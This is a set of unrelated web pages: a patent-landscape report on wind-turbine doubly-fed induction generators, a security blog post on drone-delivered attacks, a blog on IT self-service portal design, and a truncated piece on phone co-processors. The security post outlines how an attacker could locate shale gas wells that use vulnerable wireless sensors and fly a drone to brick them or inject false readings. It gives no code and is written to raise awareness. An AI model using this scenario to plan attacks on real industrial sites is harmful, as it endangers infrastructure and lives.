Speed): 68 to 134%, Power Factor(Leading): -0.90 to +0.90, Insulation Class: H/F, Efficiency: >= 96%| |14||Tecowestinghouse||TW560XX (2-3 KW)||Rated Power: 2-3kW, Rated Voltage: 460/ 575/ 690 V, Frequency: 50/ 60 Hz, Number of Poles: 4/6, Ambient Temp(°C): -40 to 50, Speed Range(% of Synch. Speed): 68 to 134%, Power Factor(Leading): -0.90 to +0.90, Insulation Class: H/F, Efficiency: >= 96%.| |15||Acciona||AW1500||Rated Power: 1.5MW, Rated Voltage: 690 V, Frequency: 50 Hz, Number of Poles: 4, Rotational Speed: 900:1,900 rpm(rated 1,680 rpm) (50Hz), Rated Stator Current: 1,500 A @ 690 V, Protection Class: IP54, Power Factor(standard): 0.98 CAP - 0.96 IND at partial loads and 1 at nominal power, Power factor(optional): 0.95 CAP - 0.95 IND throughout the power range| |16||Acciona||AW3000||Rated Power: 3.0MW, Rated Voltage: 690 V, Frequency: 50 Hz, Number of Poles: 4, Rotational Speed: 900:1,900 rpm(rated 1,680 rpm) (50Hz), Rated Stator Current: 1,500 A @ 690 V, Protection Class: IP54, Power Factor(standard): 0.98 CAP - 0.96 IND at partial loads and 1 at nominal power, Power Factor (optional): 0.95 CAP - 0.95 IND throughout the power range| |17||General Electric||GE 1.5/2.5MW||Rated Power: 1.5/2.5 MW, Frequency(Hz): 50/60| IP Search & Analysis Doubly-fed Induction Generator: Search Strategy The present study on the IP activity in the area of horizontal axis wind turbines with focus on Doubly-fed Induction Generator (DFIG) is based on a search conducted on Thomson Innovation. |S. No.||Patent/Publication No.||Publication Date |1||US6278211||08/02/01||Sweo Edwin||Brush-less doubly-fed induction machines employing dual cage rotors| |2||US6954004||10/11/05||Spellman High Voltage Electron||Doubly fed induction machine| |3||US7411309||08/12/08||Xantrex Technology||Control system for doubly fed induction generator| |4||US7485980||02/03/09||Hitachi||Power converter for doubly-fed power generator system| |5||US7800243||09/21/10||Vestas Wind Systems||Variable speed wind turbine with doubly-fed induction generator compensated for varying rotor speed| |6||US7830127||11/09/10||Wind to Power System||Doubly-controlled asynchronous generator| |S. 
No.||Class No.||Class Type||Definition| |1||F03D9/00||IPC||Machines or engines for liquids; wind, spring, or weight motors; producing mechanical power or a reactive propulsive thrust, not otherwise provided for / Wind motors / Adaptations of wind motors for special use; Combination of wind motors with apparatus driven thereby (aspects predominantly concerning driven apparatus)| |2||F03D9/00C||ECLA||Machines or engines for liquids; wind, spring, or weight motors; producing mechanical power or a reactive propulsive thrust, not otherwise provided for / Wind motors / Adaptations of wind motors for special use; Combination of wind motors with apparatus driven thereby (aspects predominantly concerning driven apparatus) / The apparatus being an electrical generator| |3||H02J3/38||IPC||Generation, conversion, or distribution of electric power / Circuit arrangements or systems for supplying or distributing electric power; systems for storing electric energy / Circuit arrangements for ac mains or ac distribution networks / Arrangements for parallely feeding a single network by two or more generators, converters or transformers| |4||H02K17/42||IPC||Generation, conversion, or distribution of electric power / Dynamo-electric machines / Asynchronous induction motors; Asynchronous induction generators / Asynchronous induction generators| |5||H02P9/00||IPC||Generation, conversion, or distribution of electric power / Control or regulation of electric motors, generators, or dynamo-electric converters; controlling transformers, reactors or choke coils / Arrangements for controlling electric generators for the purpose of obtaining a desired output| |6||290/044||USPC||Prime-mover dynamo plants / electric control / Fluid-current motors / Wind| |7||290/055||USPC||Prime-mover dynamo plants / Fluid-current motors / Wind| |8||318/727||USPC||Electricity: motive power systems / Induction motor systems| |9||322/047||USPC||Electricity: single generator systems / Generator control / Induction generator| |S. No.||Concept 1||Concept 2||Concept 3| Thomson Innovation Search Database: Thomson Innovation Patent coverage: US EP WO JP DE GB FR CN KR DWPI Time line: 01/01/1836 to 07/03/2011 |S. No.||Concept||Scope||Search String||No. 
of Hits| |1||Doubly-fed Induction Generator: Keywords(broad)||Claims, Title, and Abstract||(((((doubl*3 OR dual*3 OR two) ADJ3 (power*2 OR output*4 OR control*4 OR fed OR feed*3)) NEAR5 (induction OR asynchronous)) NEAR5 (generat*3 OR machine*1 OR dynamo*1)) OR dfig or doig)||873| |2||Doubly-fed Induction Generator: Keywords(broad)||Full Spec.||(((((doubl*3 OR dual*3 OR two) ADJ3 (power*2 OR output*1 OR control*4 OR fed OR feed*3)) NEAR5 (generat*3 OR machine*1 OR dynamo*1))) OR dfig or doig)||-| |3||Induction Machine: Classes||US, IPC, and ECLA Classes||((318/727 OR 322/047) OR (H02K001742))||-| |4||Generators: Classes||US, IPC, and ECLA Classes||((290/044 OR 290/055) OR (F03D000900C OR H02J000338 OR F03D0009* OR H02P0009*))||-| |5||Combined Query||-||2 AND 3||109| |6||Combined Query||-||2 AND 4||768| |7||French Keywords||Claims, Title, and Abstract||((((doubl*3 OR dual*3 OR two OR deux) NEAR4 (nourris OR feed*3 OR puissance OR sortie*1 OR contrôle*1)) NEAR4 (induction OR asynchron*1) NEAR4 (générateur*1 OR generator*1 OR machine*1 OR dynamo*1)) OR dfig or doig)||262| |8||German Keywords||Claims, Title, and Abstract||(((((doppel*1 OR dual OR two OR zwei) ADJ3 (ausgang OR ausgänge OR kontroll* OR control*4 OR gesteuert OR macht OR feed*1 OR gefüttert OR gespeiste*1)) OR (doppeltgefüttert OR doppeltgespeiste*1)) NEAR4 (((induktion OR asynchronen) NEAR4 (generator*2 OR maschine*1 OR dynamo*1)) OR (induktion?maschinen OR induktion?generatoren OR asynchronmaschine OR asynchrongenerator))) OR dfig)||306| |9||Doubly-fed Induction Generator: Keywords(narrow)||Full Spec.||(((((((doubl*3 OR dual*3) ADJ3 (power*2 OR output*4 OR control*4 OR fed OR feed*3))) NEAR5 (generat*3 OR machine*1 OR dynamo*1))) SAME wind) OR (dfig SAME wind))||1375| |10||Top Assignees||-||(vestas* OR (gen* ADJ2 electric*) OR ge OR hitachi OR woodward OR repower OR areva OR gamesa OR ingeteam OR nordex OR siemens OR (abb ADJ2 research) OR (american ADJ2 superconductor*) OR (korea ADJ2 electro*) OR (univ* NEAR3 navarra) OR (wind OR technolog*) OR (wind ADJ2 to ADJ2 power))||-| |11||Combined Query||-||2 AND 10||690| |12||Top Inventors||-||((Andersen NEAR2 Brian) OR (Engelhardt NEAR2 Stephan) OR (Ichinose NEAR2 Masaya) OR (Jorgensen NEAR2 Allan NEAR2 Holm) OR ((Scholte ADJ2 Wassink) NEAR2 Hartmut) OR (OOHARA NEAR2 Shinya) OR (Rivas NEAR2 Gregorio) OR (Erdman NEAR2 William) OR (Feddersen NEAR2 Lorenz) OR (Fortmann NEAR2 Jens) OR (Garcia NEAR2 Jorge NEAR2 Martinez) OR (Gertmar NEAR2 Lars) OR (KROGH NEAR2 Lars) OR (LETAS NEAR2 Heinz NEAR2 Hermann) OR (Lopez NEAR2 Taberna NEAR2 Jesus) OR (Nielsen NEAR2 John) OR (STOEV NEAR2 Alexander) OR (W?ng NEAR2 Haiqing) OR (Yuan NEAR2 Xiaoming))||-| |13||Combined Query||-||((3 OR 4) AND 10)||899| |14||Final Query||-||1 OR 5 OR 6 OR 7 OR 8 OR 9 OR 11 OR 13||2466(1060 INPADOC Families)| - Use the mouse(click and drag/scroll up or down/click on nodes) to explore nodes in the detailed taxonomy - Click on the red arrow adjacent to the node name to view the content for that particular node in the dashboard A sample of 139 patents from the search is analyzed based on the taxonomy. Provided a link below for sample spread sheet analysis for doubly-fed induction generators. 
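Before the patent-by-patent analysis below, the small numeric sketch that follows ties the search results back to the point made in the introduction: with the speed range limited to roughly ±30% of synchronous speed, the rotor-side converter of a DFIG only has to carry the slip fraction of the power. The model is an idealised, loss-free approximation and the operating points are illustrative, not taken from any specific turbine in the product table.

```python
# Idealised, loss-free sketch of the DFIG power split versus slip.
# Steady-state approximation: P_mech = (1 - s) * P_stator and
# P_rotor = -s * P_stator, so the converter carries only the slip fraction.

def dfig_power_split(p_mech_mw, slip):
    p_stator = p_mech_mw / (1.0 - slip)
    p_rotor = -slip * p_stator
    return p_stator, p_rotor

if __name__ == "__main__":
    rated_mw = 2.0  # illustrative rating, similar to the product table above
    # Rated output occurs near maximum (super-synchronous) speed; at
    # sub-synchronous speeds the captured wind power is well below rated.
    operating_points = [(-0.3, 2.0), (0.0, 1.0), (0.3, 0.4)]  # (slip, mech MW)
    for slip, p_mech in operating_points:
        _, p_rotor = dfig_power_split(p_mech, slip)
        share = abs(p_rotor) / rated_mw
        print(f"slip {slip:+.1f}: converter handles {abs(p_rotor):.2f} MW "
              f"({share:.0%} of the {rated_mw:.0f} MW rating)")
```

Under these assumptions the converter never sees more than about a quarter of the turbine rating, which is the reason the literature quotes a 20-30% converter size for limited-range variable-speed operation.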
|S.No.||Patent/Publication No.||Publication Date||Assignee||Title||Problem||Solution|
|1||US20100117605||05/13/10||Woodward||Method of and apparatus for operating a double-fed asynchronous machine in the event of transient mains voltage changes||Short-circuit-like currents during transient mains voltage changes produce a corresponding air-gap torque that loads the drive train and transmission lines and can damage or degrade the drive train and power system equipment.||The stator is connected to the network and the rotor to a converter. After a transient mains voltage change occurs, the converter sets a reference value of an electrical amplitude in the rotor such that the rotor flux approaches the stator flux.|
|2||US20100045040||02/25/10||Vestas Wind Systems||Variable speed wind turbine with doubly-fed induction generator compensated for varying rotor speed||The DFIG system has poor damping of oscillations within the flux dynamics due to cross coupling between active and reactive currents, which makes the system potentially unstable under certain circumstances and complicates the work of the rotor current controller. These oscillations can damage the drive train mechanisms.||A compensation block feeds a compensation control output to the rotor of the generator. A computation unit computes this output during operation of the turbine to partly compensate for the dependence of the generator transfer-function pole locations on rotor angular speed, so that the transfer function becomes independent of speed variations during operation; this eliminates the oscillations and increases the efficiency of the wind turbine.|
|3||US20090267572||10/29/09||Woodward||Current limitation for a double-fed asynchronous machine||Abnormal currents can damage the windings of the doubly-fed induction generator, and controlling these currents with subordinate current controllers is not an efficient way to extract the maximum amount of active power.||A maximum permissible reference value of active power is delivered or received during operation of the double-fed asynchronous machine; the predetermined active and reactive power reference values are limited to calculated maximum permissible values, which ensures reliably regulated active and reactive power without affecting the power adjustment. The rotor is electrically connected through slip rings to a pulse-controlled inverter of a static frequency changer, which imposes a voltage of variable amplitude and frequency on the rotor.|
|4||US20090008944||01/08/09||Universidad Publica De Navarra||Method and system of control of the converter of an electricity generation facility connected to an electricity network in the presence of voltage sags in said network||Double-fed asynchronous generators are very sensitive to faults that may arise in the electricity network, such as voltage sags. During sag conditions the current that appears in the converter may reach very high values and may even destroy it.||When a voltage sag occurs, the converter imposes a new set-point current obtained by adding to the previous set-point current a new term, called the demagnetizing current, which is proportional to the free flux of the generator stator. The difference between the stator magnetic flux and the stator flux associated with the direct component of the stator voltage is estimated, and this difference is multiplied by a factor to produce the demagnetizing current.|
|5||US7355295||04/08/08||Ingeteam Energy||Variable speed wind turbine having an exciter machine and a power converter not connected to the grid||a) The active switching of the semiconductors of the grid-side converter injects undesirable high-frequency harmonics into the grid. b) The use of power electronic converters (4) connected to the grid (9) causes harmonic distortion of the network voltage.||Power is delivered to the grid only through the stator of the doubly fed induction generator, avoiding undesired harmonic distortion. Grid Flux Orientation (GFO) is used to accurately control the power injected into the grid. An advantage of this control system is that it does not depend on machine parameters, which may vary significantly, or on theoretical machine models, avoiding additional adjusting loops and achieving better power quality fed into the utility grid.|
|6||US20080203978||08/28/08||Semikron||Frequency converter for a double-fed asynchronous generator with variable power output and method for its operation||An Optislip circuit with a resistor is used when the speed is above synchronous speed; this heats the resistor and thus the generator, limiting operation in the super-synchronous range and resulting in tower fluctuations.||A back-to-back converter is provided whose inverter circuit has direct current (DC) inputs, DC outputs, and a rotor rectifier connected to the rotor of the doubly fed asynchronous generator. A mains inverter is connected to the power grid, and an intermediate circuit connects the DC inputs with the DC outputs. The intermediate circuit has a semiconductor switch between the DC outputs, an intermediate-circuit capacitor between the DC inputs, and a diode between the semiconductor switch and the capacitor. This allows operation at any wind speed and reduces the tower fluctuations.|
|7||US20070210651||09/13/07||Hitachi||Power converter for doubly-fed power generator system||During ground faults, excess current is induced in the secondary windings and flows into the power converter connected to the secondary side, which may damage the converter. The conventional remedy of increasing the capacity of the power converter increases system cost, degrades the system, and delays reactivating the system to supply power again.||The generator is provided with an excitation power converter connected to the secondary windings of the doubly-fed generator via an impedance (e.g. a reactor), and a diode rectifier connected in parallel to the secondary windings via another impedance. The DC link of the rectifier is connected in parallel to the DC link of the converter. A controller outputs an on-command to a power semiconductor switching element of the converter if the current flowing in that element reaches a predetermined value or larger.|
|8||US20070132248||06/14/07||General Electric||System and method of operating double fed induction generators||Wind turbines with doubly fed induction generators are sensitive to grid faults. Conventional methods are ineffective at reducing shaft stress during grid faults, respond slowly, and using a dynamic voltage restorer (DVR) is expensive.||The protection system uses controlled impedance devices built from bidirectional semiconductors such as triacs, thyristor assemblies, or anti-parallel thyristors. Each controlled impedance device is coupled between a respective phase of the stator winding of the doubly fed induction generator and a respective phase of a grid-side converter. A controller couples and decouples impedance in one or more of the devices in response to changes in utility grid voltage and current; high impedance is presented to the grid during network faults to isolate the doubly fed wind turbine generator.|
|9||US20060192390||08/31/06||Gamesa Innovation||Control and protection of a doubly-fed induction generator system||A short circuit in the grid causes the generator to feed high stator currents into the short circuit; the rotor currents increase very rapidly and can damage the power-electronic components of the converter connecting the rotor windings with the rotor inverter.||The converter is provided with a clamping unit that is triggered from a non-operating state to an operating state when over-current is detected in the rotor windings. The clamping unit comprises a passive voltage-dependent resistor element that provides a clamping voltage across the rotor windings when the clamping unit is triggered.|
|10||US20050189896||09/01/05||ABB Research||Method for controlling doubly-fed machine||Controlling doubly fed machines on the basis of inverter control, in order to implement the targets set for the machine, relies on a model that is extremely complicated and includes numerous parameters that often have to be determined.||A method is provided for using a standard scalar-controlled frequency converter for machine control. A frequency reference for the inverter and a reactive power reference are set for the machine, and a rotor current compensation reference is derived from the reactive power reference and the measured reactive power. The scalar-controlled inverter then produces the voltage for the rotor of the machine based on the frequency reference and the rotor current compensation reference.|
Click here to view the detailed analysis sheet for doubly-fed induction generators patent analysis.
|S.No.||Article Title||Publication Date||Source||Summary|
|1||Study on the Control of DFIG and its Responses to Grid Disturbances||01/01/06||Power Engineering Society General Meeting, 2006. IEEE||Presents a dynamic model of the DFIG, including the mechanical model, the generator model, and the PWM voltage source converters. Vector control strategies are adapted for both the rotor-side converter (RSC) and the grid-side converter (GSC) to control speed and reactive power independently. Control design methods such as pole placement and internal model control are used, with MATLAB/Simulink for simulation.|
|2||Application of Matrix Converter for Variable Speed Wind Turbine Driving an Doubly Fed Induction Generator||05/23/06||Power Electronics, Electrical Drives, Automation and Motion, 2006. SPEEDAM 2006.||The back-to-back converter in a variable-speed wind turbine with a doubly fed induction generator is replaced with a matrix converter. Stable operation is achieved with a stator-flux-oriented control technique, and the system operates in both sub- and super-synchronous modes with good results.|
|3||Optimal Power Control Strategy of Maximizing Wind Energy Tracking and Conversion for VSCF Doubly Fed Induction Generator System||08/14/06||Power Electronics and Motion Control Conference, 2006. IPEMC 2006. CES/IEEE 5th International||Proposes a new optimal control strategy for maximum wind power extraction, verified by simulation. The control algorithm is also used to minimize losses in the generator, and a dual-passage excitation control strategy is applied to decouple the active and reactive powers. Simulation results show good robustness and high generator efficiency.|
|4||A Torque Tracking Control algorithm for Doubly–fed Induction Generator||01/01/08||Journal of Electrical Engineering||Proposes a torque tracking control algorithm for the doubly fed induction generator using PI controllers, achieved by controlling the rotor currents in a stator voltage vector reference frame.|
|5||Fault Ride Through Capability Improvement Of Wind Farms Using Doubly Fed Induction Generator||09/04/08||Universities Power Engineering Conference, 2008. UPEC 2008. 43rd International||Presents an active diode-bridge crowbar switch to improve the fault ride-through capability of the DFIG, and examines crowbar parameters such as crowbar resistance, power loss, temperature, and the time delay for deactivation during a fault.|
Click here to view the detailed analysis sheet for doubly-fed induction generators article analysis.
Top Cited Patents
|S. No.||Patent/Publication No.||Publication Date||Assignee||Title||No. of Citations|
|1||US5289041||02/22/94||US Windpower||Speed control system for a variable speed wind turbine||80|
|2||US4982147||01/01/91||Oregon State||Power factor motor control system||62|
|3||US5028804||07/02/91||Oregon State||Brushless doubly-fed generator control system||51|
|4||US5239251||08/24/93||Oregon State||Brushless doubly-fed motor control system||49|
|5||US6856038||02/15/05||Vestas Wind Systems||Variable speed wind turbine having a matrix converter||43|
|6||WO1999029034||06/10/99||Asea Brown||A method and a system for speed control of a rotating electrical machine with flux composed of two quantities||36|
|7||WO1999019963||04/22/99||Asea Brown||Rotating electric machine||36|
|8||US7015595||03/21/06||Vestas Wind Systems||Variable speed wind turbine having a passive grid side rectifier with scalar power control and dependent pitch control||34|
|9||US4763058||08/09/88||Siemens||Method and apparatus for determining the flux angle of rotating field machine or for position-oriented operation of the machine||32|
|10||US7095131||08/22/06||General Electric||Variable speed wind turbine generator||25|
Top Cited Articles
White Space Analysis
- White-space analysis shows technology growth and the gaps in the technology where further R&D can be done to gain a competitive edge and carry out incremental innovation.
- Dolcera provides white-space analysis along different dimensions (product, market, method of use, capabilities, application, or business area) and defines the exact categories within each dimension.
- The table below shows a sample representation of white-space analysis for controlling DFIG parameters with converters, based on the sample analysis.
|Doubly Fed Induction Generator - Dashboard|
- Flash Player is required to view the Dolcera dashboard
- Vestas Wind Systems and General Electric are the major players in wind energy generation technology.
- Patenting activity has seen a very high growth rate in the last two years.
- The USA, China, Germany, Spain, and India are very active in wind energy research.
- Around 86% of the patents are on controlling the doubly-fed induction generator (DFIG), which indicates high research activity in rating and controlling DFIG systems.
Issues in the Technology
- 86% of the patents on DFIG operation focus on the grid-connected mode of operation, suggesting that continuous operation of the DFIG system during weak and stormy winds, grid voltage sags, and grid faults is the major issue in the current scenario.
- Woodward is a new and fast-developing player in the field of DFIG technology. The company filed 10 patent applications in the field in 2010, while it had no prior IP activity.
Like this report?
This is only a sample report with brief analysis. Dolcera can provide a comprehensive report customized to your needs.
|Buy the customized report from Dolcera|
|Patent Analytics Services||Market Research Services||Purchase Patent Dashboard|
|Patent Landscape Services||Dolcera Processes||Industry Focus|
|Patent Search Services||Patent Alerting Services||Dolcera Tools|
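Since the patent and article analysis above centres on rotor-side current control (vector control with PI regulators and current limiting during grid disturbances), a minimal simulation sketch may help make the idea concrete. It is not taken from any of the cited patents or papers: the first-order plant model, gains, and limits are all invented for illustration.

```python
# Minimal, hypothetical sketch of PI-based rotor current control for a DFIG
# rotor-side converter. Plant model, gains, and limits are illustrative only;
# no anti-windup or decoupling terms are included, to keep the sketch short.

KP, KI = 2.0, 50.0                # PI gains (assumed)
DT = 1e-4                         # control period in seconds (assumed)
R_ROTOR, L_ROTOR = 0.1, 5e-3      # assumed rotor resistance (ohm) and transient inductance (H)
V_LIMIT, I_LIMIT = 300.0, 800.0   # converter voltage and rotor current limits (assumed)

def clamp(x, lo, hi):
    return max(lo, min(hi, x))

def simulate(i_ref=400.0, steps=5000):
    """Track a rotor current reference with a PI regulator on a first-order model."""
    i_rotor, integral = 0.0, 0.0
    for _ in range(steps):
        # Current limiting, in the spirit of the current-limitation patents above:
        # the reference handed to the regulator is never allowed beyond I_LIMIT.
        ref = clamp(i_ref, -I_LIMIT, I_LIMIT)
        error = ref - i_rotor
        integral += error * DT
        v_cmd = clamp(KP * error + KI * integral, -V_LIMIT, V_LIMIT)
        # Simplified rotor current dynamics: L * di/dt = v - R * i
        i_rotor += DT * (v_cmd - R_ROTOR * i_rotor) / L_ROTOR
    return i_rotor

print(f"steady-state rotor current: {simulate():.1f} A")
```

Real rotor-side controllers work in a rotating reference frame with separate d- and q-axis regulators and cross-coupling compensation; this sketch only shows the basic closed loop that those schemes build on.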
<urn:uuid:890158dd-0320-492b-8e24-374653ea9593>
CC-MAIN-2017-09
https://www.dolcera.com/wiki/index.php?title=Wind_Energy&mobileaction=toggle_view_mobile
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00409-ip-10-171-10-108.ec2.internal.warc.gz
en
0.818738
9,658
3.21875
3
By Cesar Cerrudo @cesarcer

Every day we hear about a new vulnerability or a new attack technique, but most of the time it's difficult to imagine the real impact. The current emphasis on cyberwar (cyber-warfare if you prefer) leads to myths and nonsense being discussed. I wanted to show real-life examples of large-scale attacks with big impacts on critical infrastructure, people, companies, etc.

The idea of this post is to raise awareness. I want to show how vulnerable some industrial, oil, and gas installations currently are and how easy it is to attack them. Another goal is to pressure vendors to produce more secure devices and to speed up the patching process once vulnerabilities are reported.

The attack in this post is based on research done by my fellow pirates, Lucas Apa and Carlos Penagos. They found critical vulnerabilities in wireless industrial control devices. This research was first presented at BH USA 2013. You can find their full presentation here: https://www.blackhat.com/us-13/archives.html#Apa

A common information leak occurs when vendors highlight how they helped Company X with their services or products. This information is very useful for supply chain attacks. If you are targeting Company X, it's good to look at their service and product providers. It's also useful to know what software, devices, and technology they use. In this case, one of the vendors that sells vulnerable wireless industrial control devices is happy to announce in a press release that Company X has acquired its wireless sensors and is using them in the Haynesville Shale fields. So, as an attacker, we now know that Company X is using vulnerable wireless sensors at the Haynesville Shale fields.

Haynesville Shale fields, what's that? A quick Google search turns up plenty. How does Google know about shale well locations? It's simple: publicly available information. You can display wells by name, organization, etc., and interactive maps are available too. You can find all of Company X's wells along with their exact locations (geographical coordinates). You know almost exactly where the vulnerable wireless sensors are installed.

Since the wells are at remote locations, exploiting the wireless sensor vulnerabilities becomes an interesting challenge. Enter drones, or UAVs (unmanned aerial vehicles). Commercially available drones range from a couple hundred dollars to tens of thousands of dollars, depending on range, endurance, functionality, etc. You can even build your own and save some money.

The idea is to put the attack payload in a drone, send it to the wells' location, and launch the attack. This isn't difficult to do, since drones can be programmed to fly to x,y coordinates and execute the payload while flying around the target coordinates (no need to return). Depending on your budget, you can launch an attack from a nearby location or from very far away; depending on the drone's endurance, you can be X miles away from the target, and you can extend the drone's range depending on the radio and antenna used.

The types of exploits you could launch from the drone range from bricking all of the wireless devices to causing physical harm to the shale gas installations. Manipulating device firmware or injecting fake data into radio packets could make the control systems believe things like the temperature or pressure readings are wrong. Just bricking the devices could cost Company X significant money, since the devices would need to be reconfigured or reflashed.
The exploits could interfere with shale gas extraction and even halt production. The consequences of an attack could be even more catastrophic depending on how the vulnerable devices are being used. Attacks could also be expanded to target more than just one vendor's devices: drones could do reconnaissance first, scan for and identify devices from different vendors, and then launch attacks targeting all of the specific devices found.

To highlight the attack possibilities and their consequences, I extracted the following from http://www.onworld.com/news/newsoilandgas.html (the companies mentioned in this article are not necessarily vulnerable; this is just for illustrative purposes):

"…Pipelines & Corrosion Monitoring Wireless flow, pressure, level, temperature and valve position monitoring are used to streamline pipeline operation and storage while increasing safety and regulatory compliance. In addition, wireless sensing solutions are targeted at the billions of dollars per year that is spent managing pipeline corrosion. While corrosion is a growing problem for the aging pipeline infrastructure it can also lead to leaks, emissions and even deadly explosions in production facilities and refineries…."

Leaks and deadly explosions can have tragic consequences. Cyber criminals, terrorists, state actors, etc. can launch big-impact attacks with relatively small budgets. Their attacks could produce economic losses, physical damage, and even explosions. While isolated attacks have a small impact when put in the context of cyberwar, they can cause panic in populations, political crises, or geopolitical problems if combined with other, larger-impact attacks.

In a future post I will probably describe more of these kinds of large-scale, big-impact attacks.
<urn:uuid:4b2ccb53-276c-434d-b91f-1fa6d1cce849>
CC-MAIN-2017-09
http://blog.ioactive.com/2013/11/practical-and-cheap-cyberwar-cyber.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00109-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925856
1,057
2.609375
3
IT has a notorious reputation for taking long-established English words and twisting them to mean something different. For example, the word 'programme' (note the deliberate English spelling of program) can mean a radio or TV programme, a programme of events, or even a computer program. The same can be said for the word 'portal,' a word that, within the last few years, has gained a lot of popularity and buzz within IT.

I've seen many definitions for the word 'portal,' including a gate, a door, the end of a tunnel, and even "a magical or technological doorway." That one is my favourite. Why aren't self-service portals exciting? Why shouldn't they be fun and compelling? Too often they are just online form fillers with little or no graphic design or content.

Using a portal for the first time is a voyage of discovery. Technicians tend to see portals as information exchanges, so they give little thought to the portal's design or usability. Portal users see portals as a reflection of the portal supplier (IT), and therefore the entire organisation or team is judged by the quality of the portal experience.

I used to use one portal quite often. During my first visit, I noticed an obvious spelling mistake. There was nowhere within the portal where I could report this mistake. Eventually, I moved on to another portal, but when I made this shift, that particular mistake was still there! To make matters worse, the portal was boring and lacked any kind of lustre, which I assumed meant the company supplying the portal was the same. A portal is a reflection of the supplier, and users will judge it accordingly. We do this in our personal lives, so why wouldn't we do it with work?

What do we need to do to secure a positive portal experience? You must first accept the fact that customers will judge an organisation, team, or department by the portal provided to them. This includes the portal's design, accuracy, usability, and feedback. For me, these are the four essential elements for a successful self-service portal. But of course, the portal must also always support the collection and provision of information that meets both the portal creator's and the users' technical needs.

- Design is key. Do you remember when at school, if you hated a particular subject, you tried your best to avoid taking it? Sometimes this wasn't possible, especially if it was a requirement, but if the subject was an option, you definitely could. The same is true with portals: if you don't like a portal, you'll avoid using it. For example, in the village where I live, two banks have their ATM machines (yes, an ATM machine is a portal) on opposite sides of the street. I will always cross the street to the same bank each time because I prefer its portal. If you provide a good tool, you're enabling your customers (and yourselves) to be more efficient, because a self-service portal is a vital business tool. The key point here is to involve your corporate marketing/graphic design team to help design your portal. At the very least, use corporate colours, fonts, and logos so the portal reflects the brand.
- Accuracy is much more important than you might think. In essence, we are talking about image: "If they can't spell, what else have they got wrong?" Stay alert, because changes to the portal often bring those errors. You may classify these as incidents, but the user will call them mistakes. Monitor and measure portal usage to look for clues to improve or repair the portal. The Service Desk can be very useful here, logging user concerns and questions and then feeding this information back to the portal owners; the Service Desk will hear all about portal issues when folks contact them with their incidents. Never accept second best when it comes to accuracy.
- Human beings depend on feedback. Every second of every day your brain is constantly measuring your body and taking action, such as telling you to take off your jumper (sweater, for my North American friends) because you are getting too hot. Likewise, using a device without a feedback button can cause resentment because a door has been closed. Make sure your portal contains a feedback button or link, a conduit for comments and suggestions (a minimal sketch of such a feedback endpoint appears at the end of this post). Feedback is an essential element of continual service improvement. It may not be possible to immediately fix a fault, but you can make sure that fault won't appear in the next portal release.
- For a long time, usability has been a thorn in the side of IT, because business customers are becoming more and more IT literate. Simple things can cause great frustration, like re-entering your data when you make a mistake or not being able to translate a message on the screen into another language. To help prevent this, get folks who were not involved in developing the portal to review it and provide their assessment prior to its launch. Effective usability leads to happy users.

Take these four points and consider them pitfalls to avoid. Your goal is to provide a useful, effective, and efficient means for your customers to connect with the business. This is a challenge, but as with any challenge, the rewards are significant. If you've developed a successful self-service portal like the National Trust for Scotland (here), please tell us about it and how it's helping IT become more efficient.
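As a purely illustrative companion to the feedback point above, here is a minimal sketch of a portal feedback endpoint. It is not from any particular portal product; the route name, fields, and in-memory storage are assumptions, and a real implementation would add authentication, validation, and a proper datastore.

```python
# Minimal, hypothetical feedback endpoint for a self-service portal.
# Route name, fields, and in-memory storage are illustrative assumptions;
# a production portal would add authentication, validation, and persistence.
from datetime import datetime, timezone
from flask import Flask, jsonify, request

app = Flask(__name__)
feedback_store = []  # stand-in for a database table

@app.route("/feedback", methods=["POST"])
def submit_feedback():
    data = request.get_json(silent=True) or {}
    entry = {
        "page": data.get("page", "unknown"),          # where in the portal the comment was made
        "category": data.get("category", "general"),  # e.g. spelling, usability, missing content
        "comment": (data.get("comment") or "").strip(),
        "submitted_at": datetime.now(timezone.utc).isoformat(),
    }
    if not entry["comment"]:
        return jsonify({"error": "comment is required"}), 400
    feedback_store.append(entry)
    # Feeding this back to the portal owners (and the Service Desk) closes the loop.
    return jsonify({"status": "received", "count": len(feedback_store)}), 201

if __name__ == "__main__":
    app.run(debug=True)
```

Even something this small gives users the "conduit for comments and suggestions" described above and gives the portal team raw material for continual service improvement.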
<urn:uuid:dae4652e-358f-413d-a2fa-123902a09c32>
CC-MAIN-2017-09
https://www.cherwell.com/blog/4-pitfalls-to-avoid-when-creating-a-self-service-portal
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00161-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950381
1,127
2.59375
3
Over the last few years, chipmakers have relied more and more on integration to save energy, use less physical space, and increase performance in their products. It started with little things like the memory controller, but we have reached the point where almost every important chip in a computer can be combined into one do-everything piece of silicon called a "system-on-a-chip" (or SoC for short). This trend isn't going anywhere, but a few high-end phones recently have been trying something a bit different to enable unique features—they've included one (or more) small, low-power, extremely specialized co-processors designed to support very specific features. Why do this instead of building those features into the SoC along with everything else? We'll look at the just-announced iPhone 5S and the recently released Moto X to explain why. The M7 co-processor in the 5S and the pair of co-processors in the Moto X's "X8 Computing System" have one big thing in common: they're designed to do their thing when the phone is idle, or mostly idle. The M7 receives and processes data from the iPhone's various motion sensors, even when the phone is off and in your pocket, and one of the two co-processors in the Moto X is designed to show the low-power Active Notifications when the phone moves; the other is always listening for voice input. So why not integrate these features into the SoC itself? If you know anything about SoC design, you probably realize that the chips contain many things besides the CPU and GPU, and some of these blocks are actually more-or-less equivalent to co-processors. Video encoding and decoding, for example, is generally handled by a small dedicated block so that you can play video without taxing the more power-hungry CPU or GPU. That's fine for tasks like video decoding that occur often but not always, but not so much for features that are running constantly. While modern SoCs are generally good at "power gating," or shutting off unused portions of the chip when they're not needed, keeping any part of the SoC enabled at all times will lead to small amounts of power leakage. Over time, even this minor leakage can have an adverse effect on battery life. None of this is to say that using a co-processor is always the right way to go, but it makes sense for always-on-in-the-background features like those sported by the iPhone 5S and Moto X. Phones and tablets always have to maintain a delicate balance between performance, features, and power usage, and even small adjustments, like using a co-processor instead of the main SoC, can result in better battery life over time. Using co-processors to enable this unique functionality also gives some flexibility to Apple, Google, and anyone else who wants to enable similar features. Take the X8 Computing System (please!): in the Moto X, it consists of a Qualcomm 